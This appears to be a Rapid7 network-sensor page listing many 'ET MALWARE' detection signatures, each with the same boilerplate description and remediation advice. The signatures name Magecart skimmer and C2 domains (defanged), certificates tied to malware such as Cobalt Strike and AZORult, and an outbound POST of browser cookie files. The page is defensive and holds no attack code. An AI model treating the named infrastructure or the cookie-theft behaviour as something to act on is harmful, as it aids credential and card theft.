This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Magecart Skimmer Domain (googie-analytics .online in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Magecart Skimmer Domain (googie-analytics .website in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Magecart Skimmer Domain (googletagsmanager .website in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Magecart Skimmer Domain (static-zdassets .com in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Magecart/Skimmer - _try_action CnC Domain (cdn-frontend .com in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Maldoc CnC Domain (cloud-documents .com in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Maldoc Domain (travelcrimea .info in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Malicious Cobalt Strike SSL Cert (cdnengine .biz)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Malicious Cobalt Strike SSL Cert (setupfastonline .com)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Malicious Domain Targeting Minority Groups Domain (unohcr .org in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Malicious Domain Targeting Minority Groups (officemodel .org in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Malicious Domain Targeting Minority Groups (tcahf .org in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Malicious Filename in Outbound POST Request (Browsers/Cookies/Microsoft Edge_)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Malicious SSL Cert (ACBackdoor CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (ACBackdoor CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (AgentTesla CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (AnubisStealer CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (AnubisStealer CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (APT29)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (APT32 CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (APT32 CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (APT32 CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (APT32 CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (APT32 CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (APT32 CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (APT32 CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (APT32 CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (APT32 JEShell CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (APT34 CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (APT MustangPanda CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (AsyncRAT)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (AsyncRAT CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (AsyncRAT CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (AsyncRAT CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (AsyncRAT CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (AsyncRAT CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (AsyncRAT Server)

Description
Copy link

Recommendation
Copy link

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (AZORult CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (AZORult CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (AZORult CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (AZORult CnC) 2019-11-18

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (AZORult Cnc Server) 2019-09-27

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (AZORult CnC Server) 2019-09-30

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (AZORult CnC Server) 2019-10-01

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (AZORult CnC Server) 2019-10-02

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (AZORult CnC Server) 2019-10-03

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (AZORult CnC Server) 2019-10-03

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (AZORult CnC Server) 2019-10-07

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (AZORult CnC Server) 2019-10-08

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (AZORult CnC Server) 2019-10-08

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (AZORult CnC Server) 2019-10-08

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (AZORult CnC Server) in SNI 2019-09-27

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Baka Skimmer Staging CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Baka Skimmer Staging CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Baka Skimmer Staging CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Baka Skimmer Staging CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Baka Skimmer Staging CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Baka Skimmer Staging CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Baka Skimmer Staging CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Bancos Variant CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (BazaLoader CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (BazaLoader CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Bazar Backdoor)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Bazar Backdoor)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Bazar Backdoor)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (BitRAT)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (BitRAT CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (BitRAT CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Blackrota)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (BrushaLoader CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (BrushaLoader CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (BrushaLoader CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (BrushaLoader CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (BrushaLoader CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (BrushaLoader CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (BrushaLoader CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (BrushaLoader CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (BrushaLoader CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (chMiner/RAT)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Cobalt Group/More_Eggs CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Cobalt Strike)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Cobalt Strike CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Cobalt Strike CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Cobalt Strike CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Cobalt Strike CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Cobalt Strike CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Cobalt Strike CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Cobalt Strike CnC)

Description
Copy link

